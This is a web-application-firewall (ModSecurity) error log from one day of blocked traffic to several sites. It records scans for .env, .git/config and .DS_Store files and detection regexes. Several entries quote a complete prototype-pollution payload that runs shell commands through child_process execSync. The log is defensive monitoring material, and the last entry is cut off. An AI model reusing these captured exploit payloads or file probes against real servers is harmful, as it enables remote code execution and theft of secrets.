[Fri Dec 12 03:45:03.372609 2025] [:error] [pid 682476] [client 72.62.35.117:56546] [client 72.62.35.117] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(id).tostring().trim().replace(/n/g | ) throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aTuBr3_DTRHSKuyzIAr19QAAAAc"]
[Fri Dec 12 03:45:03.373977 2025] [:error] [pid 682476] [client 72.62.35.117:56546] [client 72.62.35.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aTuBr3_DTRHSKuyzIAr19QAAAAc"]
[Fri Dec 12 03:45:03.374153 2025] [:error] [pid 682476] [client 72.62.35.117:56546] [client 72.62.35.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aTuBr3_DTRHSKuyzIAr19QAAAAc"]
[Fri Dec 12 07:28:06.705196 2025] [authz_core:error] [pid 682425] [client 159.65.18.197:34642] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 12 07:28:09.705436 2025] [:error] [pid 682474] [client 159.65.18.197:58820] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTu1-TXxTitIpsJr2R8fugAAAAU"]
[Fri Dec 12 07:28:09.705675 2025] [:error] [pid 682474] [client 159.65.18.197:58820] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTu1-TXxTitIpsJr2R8fugAAAAU"]
[Fri Dec 12 07:28:09.705925 2025] [:error] [pid 682474] [client 159.65.18.197:58820] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTu1-TXxTitIpsJr2R8fugAAAAU"]
[Fri Dec 12 07:28:10.708524 2025] [:error] [pid 682476] [client 159.65.18.197:58836] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTu1-n_DTRHSKuyzIAr2FQAAAAc"]
[Fri Dec 12 07:28:10.708756 2025] [:error] [pid 682476] [client 159.65.18.197:58836] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTu1-n_DTRHSKuyzIAr2FQAAAAc"]
[Fri Dec 12 07:28:10.708926 2025] [:error] [pid 682476] [client 159.65.18.197:58836] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTu1-n_DTRHSKuyzIAr2FQAAAAc"]
[Fri Dec 12 07:28:12.708545 2025] [:error] [pid 682426] [client 159.65.18.197:58850] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTu1_JQyFm6rQXaFcEIgCgAAAAI"]
[Fri Dec 12 07:28:12.708807 2025] [:error] [pid 682426] [client 159.65.18.197:58850] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTu1_JQyFm6rQXaFcEIgCgAAAAI"]
[Fri Dec 12 07:28:12.708978 2025] [:error] [pid 682426] [client 159.65.18.197:58850] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTu1_JQyFm6rQXaFcEIgCgAAAAI"]
[Fri Dec 12 10:42:50.881873 2025] [authz_core:error] [pid 682428] [client 139.59.136.184:56538] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 12 10:42:53.876729 2025] [:error] [pid 682427] [client 139.59.136.184:56572] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvjnUj5I9VWsopFNR7qRQAAAAM"]
[Fri Dec 12 10:42:53.876965 2025] [:error] [pid 682427] [client 139.59.136.184:56572] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvjnUj5I9VWsopFNR7qRQAAAAM"]
[Fri Dec 12 10:42:53.877136 2025] [:error] [pid 682427] [client 139.59.136.184:56572] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvjnUj5I9VWsopFNR7qRQAAAAM"]
[Fri Dec 12 10:42:54.884262 2025] [:error] [pid 682426] [client 139.59.136.184:56586] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvjnpQyFm6rQXaFcEIgMwAAAAI"]
[Fri Dec 12 10:42:54.884510 2025] [:error] [pid 682426] [client 139.59.136.184:56586] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvjnpQyFm6rQXaFcEIgMwAAAAI"]
[Fri Dec 12 10:42:54.884677 2025] [:error] [pid 682426] [client 139.59.136.184:56586] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvjnpQyFm6rQXaFcEIgMwAAAAI"]
[Fri Dec 12 10:42:56.880006 2025] [:error] [pid 682424] [client 139.59.136.184:56598] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvjoN6uoboiGY3P06OTrQAAAAA"]
[Fri Dec 12 10:42:56.880284 2025] [:error] [pid 682424] [client 139.59.136.184:56598] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvjoN6uoboiGY3P06OTrQAAAAA"]
[Fri Dec 12 10:42:56.880481 2025] [:error] [pid 682424] [client 139.59.136.184:56598] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvjoN6uoboiGY3P06OTrQAAAAA"]
[Fri Dec 12 15:02:59.949038 2025] [authz_core:error] [pid 682426] [client 165.22.235.3:38978] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 12 15:03:02.968072 2025] [:error] [pid 682428] [client 165.22.235.3:39012] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTwglg2Xx2kt-3hk5xYcfAAAAAQ"]
[Fri Dec 12 15:03:02.968317 2025] [:error] [pid 682428] [client 165.22.235.3:39012] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTwglg2Xx2kt-3hk5xYcfAAAAAQ"]
[Fri Dec 12 15:03:02.968476 2025] [:error] [pid 682428] [client 165.22.235.3:39012] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTwglg2Xx2kt-3hk5xYcfAAAAAQ"]
[Fri Dec 12 15:03:03.951277 2025] [:error] [pid 682424] [client 165.22.235.3:39018] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTwgl96uoboiGY3P06OT3wAAAAA"]
[Fri Dec 12 15:03:03.951554 2025] [:error] [pid 682424] [client 165.22.235.3:39018] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTwgl96uoboiGY3P06OT3wAAAAA"]
[Fri Dec 12 15:03:03.951736 2025] [:error] [pid 682424] [client 165.22.235.3:39018] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTwgl96uoboiGY3P06OT3wAAAAA"]
[Fri Dec 12 15:03:06.003854 2025] [:error] [pid 682474] [client 165.22.235.3:39032] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTwgmjXxTitIpsJr2R8gCAAAAAU"]
[Fri Dec 12 15:03:06.004090 2025] [:error] [pid 682474] [client 165.22.235.3:39032] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTwgmjXxTitIpsJr2R8gCAAAAAU"]
[Fri Dec 12 15:03:06.004286 2025] [:error] [pid 682474] [client 165.22.235.3:39032] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTwgmjXxTitIpsJr2R8gCAAAAAU"]
[Fri Dec 12 21:10:19.262656 2025] [:error] [pid 682475] [client 3.126.59.56:35858] [client 3.126.59.56] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTx2q1LoVhjmkwL_YHIjygAAAAY"]
[Fri Dec 12 21:10:19.263172 2025] [:error] [pid 682475] [client 3.126.59.56:35858] [client 3.126.59.56] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTx2q1LoVhjmkwL_YHIjygAAAAY"]
[Fri Dec 12 21:10:19.264179 2025] [:error] [pid 682475] [client 3.126.59.56:35858] [client 3.126.59.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTx2q1LoVhjmkwL_YHIjygAAAAY"]
[Fri Dec 12 21:10:19.264361 2025] [:error] [pid 682475] [client 3.126.59.56:35858] [client 3.126.59.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTx2q1LoVhjmkwL_YHIjygAAAAY"]
[Fri Dec 12 22:26:51.316259 2025] [:error] [pid 700178] [client 63.177.100.118:34786] [client 63.177.100.118] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTyImyS8hAm-CWbnihKhZAAAAAg"]
[Fri Dec 12 22:26:51.316728 2025] [:error] [pid 700178] [client 63.177.100.118:34786] [client 63.177.100.118] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id 